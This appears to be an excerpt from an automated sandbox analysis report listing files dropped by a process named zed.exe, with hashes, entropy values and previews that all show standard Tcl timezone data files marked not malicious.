                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Winamac) {.. {-9223372036854775808 -20785 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):233
                                                                                                                                                                                                                                            Entropy (8bit):4.7047837427916095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/2903GfJ4903GK8:MByMY3GK7Kp3GKnt2903GfJ4903GK8
                                                                                                                                                                                                                                            MD5:DEE404D54FD707C4A27F464B5F19D135
                                                                                                                                                                                                                                            SHA1:AD95D04738F6B15A93DED1DE6B5FA9F47C8E38CB
                                                                                                                                                                                                                                            SHA-256:437DA148B94DBA4CEA402169878541DB9C3419ABAB6750D1C36625DD3053019E
                                                                                                                                                                                                                                            SHA-512:421D6AF30F0C64EA6CB9F9DC4E7EF9E8EE5945F81A5E82A6D959D32AD69F325770DB6A07D8F52EFE7EE7F6C3AD4E1F34AA30A6B5E006C928119A54E746D6FE6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7638
                                                                                                                                                                                                                                            Entropy (8bit):3.8629745113156004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/nGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/GPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:DBF9C2CCF786A593C9D6E4F4BB37ACE9
                                                                                                                                                                                                                                            SHA1:4D2332A530A36E6DB2802DD9FA2DAF5C0594D5EA
                                                                                                                                                                                                                                            SHA-256:5A1F7F5EDAD0251B73C33E7B5DDEE194646E9D3992B169DC1A64D155765D472C
                                                                                                                                                                                                                                            SHA-512:70D75371497CED3B6C731C95299CDD5F8F49C3C6EEDDF31EB05D008769D76ACFE8BFA9A2ECE45BD0BA2E279BBEF65945955791EFC04A569F5CAA13665CD2545F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Inuvik) {.. {-9223372036854775808 0 0 -00}.. {-536457600 -28800 0 PST}.. {-147888000 -21600 1 PDDT}.. {-131558400 -28800 0 PST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}.. {688550400 -25200 0 MST}.. {702464400 -21600 1 MDT}.. {7200000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7671
                                                                                                                                                                                                                                            Entropy (8bit):3.832645570123566
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:7FE5Ct/cQ1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7FEct/N0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:8020712BBA127EA8AB52E8F5DB14286E
                                                                                                                                                                                                                                            SHA1:DAEBC76FE10770D3FC2B5E1C14823B2B5543BA35
                                                                                                                                                                                                                                            SHA-256:AFC4627879F4A618F5E3BA9EA123F3212E161F4CCFD0DF46F3B6B7CD2E2C0D7E
                                                                                                                                                                                                                                            SHA-512:2F5C63F427A5DEDD5BF2B3867BE4C13774E9276C1472BF4170BCB2DA462B848CC8088743D032765133EE138388DF4217E4FC1475B12D2C8AF657A45ED6FEDE93
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Iqaluit) {.. {-9223372036854775808 0 0 -00}.. {-865296000 -14400 0 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-147898800 -10800 1 EDDT}.. {-131569200 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {7024
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                                                                            Entropy (8bit):4.206296468996689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5seRvZGjFS/uk1p/uue/udYR/u+zN5hi/uW9/uoUF0/u8Bb/u33RU/uMZ8/unuR3:5jUjFo1pFGzfAYFqB43RMER3
                                                                                                                                                                                                                                            MD5:95B59E3EA2A270A34BDF98AA899203C8
                                                                                                                                                                                                                                            SHA1:93599597797F4BAFE5C75179FB795058B1E3527D
                                                                                                                                                                                                                                            SHA-256:4B9D5177CBA057CD53D53120A49B8A47ECCB00150018581A84851E9D5437D643
                                                                                                                                                                                                                                            SHA-512:032BC07F9E92B756A0732AECC2DFEC4C89A58B3D6D3CA57A0F99F2AD1D51676804C7B6CE50EB3B37BB8A1EF382168AC83989D609D37C57308E29B51F1FDEFB1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Jamaica) {.. {-9223372036854775808 -18430 0 LMT}.. {-2524503170 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {126248400 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {441781200 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                                                            Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                                            MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                                            SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                                            SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                                            SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8682
                                                                                                                                                                                                                                            Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                                            SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                                            SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                                            SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9553
                                                                                                                                                                                                                                            Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                                            SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                                            SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                                            SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8558
                                                                                                                                                                                                                                            Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                                            SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                                            SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                                            SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                                            MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                                            SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                                            SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                                            SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                                            MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                                            SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                                            SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                                            SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):218
                                                                                                                                                                                                                                            Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                                            MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                                            SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                                            SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                                            SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):460
                                                                                                                                                                                                                                            Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                                            MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                                            SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                                            SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                                            SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9726
                                                                                                                                                                                                                                            Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                                            MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                                            SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                                            SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                                            SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):228
                                                                                                                                                                                                                                            Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                                            MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                                            SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                                            SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                                            SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                                            MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                                            SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                                            SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                                            SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1539
                                                                                                                                                                                                                                            Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                                            MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                                            SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                                            SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                                            SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                                            Malicious:false
